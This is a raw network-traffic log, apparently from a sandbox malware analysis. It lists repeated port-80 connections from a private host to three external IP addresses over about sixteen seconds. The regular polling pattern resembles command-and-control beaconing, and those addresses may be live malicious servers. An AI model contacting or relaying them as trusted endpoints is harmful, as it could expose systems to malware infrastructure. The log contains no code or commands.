Aug 27, 2024 14:19:47.529800892 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.530445099 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.530790091 CEST	80	52257	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:47.530862093 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.535696030 CEST	80	52259	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:47.545416117 CEST	52251	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:47.545450926 CEST	52258	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:47.655855894 CEST	52260	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:47.657428980 CEST	52261	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:47.660744905 CEST	80	52260	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:47.660855055 CEST	52260	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:47.660952091 CEST	52260	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:47.662280083 CEST	80	52261	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:47.662342072 CEST	52261	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:47.662410021 CEST	52261	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:47.665699959 CEST	80	52260	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:47.667265892 CEST	80	52261	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:48.213974953 CEST	80	52259	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:48.214080095 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.227013111 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.231911898 CEST	80	52259	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:48.461860895 CEST	80	52259	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:48.461937904 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.577166080 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.577600956 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.582330942 CEST	80	52259	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:48.582400084 CEST	80	52262	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:48.582416058 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.582482100 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.582786083 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:48.587560892 CEST	80	52262	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:49.264280081 CEST	80	52260	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:49.264353037 CEST	52260	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:49.264420986 CEST	52260	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:49.265197992 CEST	52263	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:49.269260883 CEST	80	52260	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:49.270004988 CEST	80	52263	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:49.270080090 CEST	52263	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:49.270199060 CEST	52263	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:49.274992943 CEST	80	52263	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:49.278860092 CEST	80	52262	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:49.278928041 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.279782057 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.284565926 CEST	80	52262	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:49.523561001 CEST	80	52262	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:49.523653984 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.639565945 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.640393972 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.646935940 CEST	80	52262	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:49.647021055 CEST	52262	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.647039890 CEST	80	52264	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:49.647100925 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.647397995 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:49.653120995 CEST	80	52264	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.321351051 CEST	80	52264	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.321470022 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.322577000 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.327965975 CEST	80	52264	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.557070971 CEST	80	52264	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.557182074 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.671067953 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.671396971 CEST	52265	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.677191019 CEST	80	52264	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.677282095 CEST	52264	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.677310944 CEST	80	52265	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.677380085 CEST	52265	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.677529097 CEST	52265	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:50.683883905 CEST	80	52265	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:50.857583046 CEST	80	52263	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:50.857646942 CEST	52263	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:50.962829113 CEST	52263	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:50.968094110 CEST	80	52263	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:51.124224901 CEST	52266	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.129862070 CEST	80	52266	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:51.129921913 CEST	52266	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.132420063 CEST	52266	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.137206078 CEST	80	52266	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:51.376151085 CEST	80	52265	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:51.376276970 CEST	52265	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:51.377126932 CEST	52265	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:51.382813931 CEST	80	52265	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:51.560585022 CEST	52261	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:51.560652971 CEST	52265	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:51.560652018 CEST	52266	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.561609030 CEST	52269	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:51.561614990 CEST	52268	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.568614006 CEST	80	52268	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:51.568629026 CEST	80	52269	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:51.568780899 CEST	52268	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.568860054 CEST	52269	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:51.568866968 CEST	52268	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:51.568891048 CEST	52269	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:51.573796988 CEST	80	52268	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:51.573807001 CEST	80	52269	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:51.670582056 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:51.675487995 CEST	80	52270	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:51.675570011 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:51.675678968 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:51.682737112 CEST	80	52270	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:52.354130983 CEST	80	52270	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:52.354203939 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.361597061 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.367119074 CEST	80	52270	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:52.601002932 CEST	80	52270	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:52.601087093 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.717261076 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.717566967 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.723294973 CEST	80	52270	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:52.723371983 CEST	52270	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.724690914 CEST	80	52271	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:52.724762917 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.724916935 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:52.731712103 CEST	80	52271	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:53.171367884 CEST	80	52268	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:53.171454906 CEST	52268	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:53.171516895 CEST	52268	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:53.177021027 CEST	80	52268	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:53.282798052 CEST	52272	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:53.287638903 CEST	80	52272	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:53.287727118 CEST	52272	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:53.287843943 CEST	52272	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:53.292609930 CEST	80	52272	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:53.416254997 CEST	80	52271	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:53.417267084 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.419133902 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.424058914 CEST	80	52271	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:53.665132999 CEST	80	52271	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:53.665209055 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.787149906 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.791102886 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.792253971 CEST	80	52271	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:53.792325974 CEST	52271	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.795947075 CEST	80	52273	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:53.797272921 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.798609972 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:53.804294109 CEST	80	52273	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:54.543416023 CEST	80	52273	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:54.543486118 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.544131994 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.549361944 CEST	80	52273	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:54.830617905 CEST	80	52273	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:54.830677032 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.871963978 CEST	80	52272	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:54.872030020 CEST	52272	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:54.872088909 CEST	52272	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:54.872854948 CEST	52274	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:54.876828909 CEST	80	52272	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:54.877667904 CEST	80	52274	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:54.877732038 CEST	52274	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:54.877856016 CEST	52274	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:54.882647991 CEST	80	52274	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:54.935899019 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.936127901 CEST	52275	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.941483974 CEST	80	52273	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:54.941495895 CEST	80	52275	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:54.941555977 CEST	52273	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.941586018 CEST	52275	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.941731930 CEST	52275	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:54.947663069 CEST	80	52275	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:55.576509953 CEST	52269	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:55.576561928 CEST	52274	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:55.576596022 CEST	52275	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:55.577490091 CEST	52276	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:55.582422972 CEST	80	52276	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:55.582529068 CEST	52276	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:55.582681894 CEST	52276	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:55.587510109 CEST	80	52276	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:55.686408997 CEST	52277	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:55.687974930 CEST	52278	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:55.691239119 CEST	80	52277	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:55.691327095 CEST	52277	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:55.691427946 CEST	52277	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:55.692764044 CEST	80	52278	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:55.692821980 CEST	52278	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:55.692907095 CEST	52278	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:55.696163893 CEST	80	52277	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:55.697621107 CEST	80	52278	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:56.306447983 CEST	80	52276	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:56.306539059 CEST	52276	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:56.496973038 CEST	52276	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:56.497297049 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:56.502146006 CEST	80	52279	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:56.502196074 CEST	80	52276	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:56.502227068 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:56.502259016 CEST	52276	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:56.547033072 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:56.551806927 CEST	80	52279	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:57.297194958 CEST	80	52277	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:57.297292948 CEST	52277	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:57.297431946 CEST	52277	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:57.298379898 CEST	52280	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:57.302196980 CEST	80	52277	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:57.303211927 CEST	80	52280	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:57.303268909 CEST	52280	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:57.303368092 CEST	52280	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:57.305305004 CEST	80	52279	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:57.305358887 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.305815935 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.309257030 CEST	80	52280	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:57.311759949 CEST	80	52279	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:57.592555046 CEST	80	52279	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:57.592619896 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.701963902 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.702446938 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.707187891 CEST	80	52279	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:57.707267046 CEST	52279	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.707360983 CEST	80	52281	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:57.707428932 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.707616091 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:57.712425947 CEST	80	52281	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.421495914 CEST	80	52281	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.421591043 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.422296047 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.427067995 CEST	80	52281	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.703206062 CEST	80	52281	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.703291893 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.811120987 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.811527967 CEST	52282	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.816366911 CEST	80	52282	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.816451073 CEST	52282	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.816536903 CEST	80	52281	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.816591978 CEST	52281	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.819415092 CEST	52282	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:58.824248075 CEST	80	52282	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:58.939577103 CEST	80	52280	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:58.939663887 CEST	52280	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:58.939728975 CEST	52280	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:58.944566011 CEST	80	52280	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:59.045747042 CEST	52283	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.051457882 CEST	80	52283	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:59.051539898 CEST	52283	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.051647902 CEST	52283	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.056412935 CEST	80	52283	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:59.520168066 CEST	80	52282	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:59.520260096 CEST	52282	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:59.521035910 CEST	52282	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:59.526089907 CEST	80	52282	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:59.576210976 CEST	52278	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:59.576306105 CEST	52283	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.576313019 CEST	52282	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:59.577096939 CEST	52284	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:59.577163935 CEST	52285	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.581943989 CEST	80	52284	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:59.581959963 CEST	80	52285	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:59.582039118 CEST	52284	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:59.582159042 CEST	52285	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.582159042 CEST	52285	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:59.582217932 CEST	52284	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:59.587651968 CEST	80	52285	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:59.587677956 CEST	80	52284	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:59.686345100 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:59.691886902 CEST	80	52286	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:59.691961050 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:59.692112923 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:59.698087931 CEST	80	52286	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:00.508378029 CEST	80	52286	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:00.508505106 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.511049986 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.521583080 CEST	80	52286	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:00.765825987 CEST	80	52286	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:00.765964031 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.873877048 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.874176979 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.879240036 CEST	80	52287	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:00.879316092 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.879472971 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.879697084 CEST	80	52286	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:00.879755974 CEST	52286	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:00.884437084 CEST	80	52287	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:01.184887886 CEST	80	52285	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:01.184998035 CEST	52285	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:01.194717884 CEST	52285	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:01.199579000 CEST	80	52285	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:01.316999912 CEST	52288	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:01.323404074 CEST	80	52288	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:01.323482037 CEST	52288	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:01.336134911 CEST	52288	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:01.341267109 CEST	80	52288	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:01.612624884 CEST	80	52287	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:01.612708092 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:01.705044985 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:01.710124969 CEST	80	52287	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:01.957629919 CEST	80	52287	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:01.957695007 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.061127901 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.061513901 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.067284107 CEST	80	52287	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:02.067298889 CEST	80	52290	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:02.067372084 CEST	52287	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.067408085 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.067568064 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.073158979 CEST	80	52290	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:02.917001963 CEST	80	52290	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:02.917192936 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.918260098 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:02.922878027 CEST	80	52288	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:02.922950983 CEST	52288	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:02.923022032 CEST	52288	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:02.923765898 CEST	80	52290	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:02.923809052 CEST	52291	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:02.927767038 CEST	80	52288	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:02.928572893 CEST	80	52291	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:02.928658962 CEST	52291	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:02.928744078 CEST	52291	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:02.933490038 CEST	80	52291	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:03.154135942 CEST	80	52290	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:03.154215097 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.264381886 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.264679909 CEST	52292	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.269807100 CEST	80	52292	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:03.269819975 CEST	80	52290	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:03.269891024 CEST	52290	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.269906044 CEST	52292	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.270104885 CEST	52292	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.275028944 CEST	80	52292	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:03.576307058 CEST	52291	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:03.576411963 CEST	52284	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:03.576453924 CEST	52292	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.577632904 CEST	52293	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.582489967 CEST	80	52293	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:03.582576990 CEST	52293	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.582772970 CEST	52293	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:03.587515116 CEST	80	52293	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:03.686429977 CEST	52294	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:03.689035892 CEST	52295	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:03.691350937 CEST	80	52294	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:03.691442966 CEST	52294	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:03.691550016 CEST	52294	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:03.694013119 CEST	80	52295	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:03.694082975 CEST	52295	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:03.694185972 CEST	52295	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:03.696408033 CEST	80	52294	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:03.698992014 CEST	80	52295	89.23.103.42	192.168.2.6
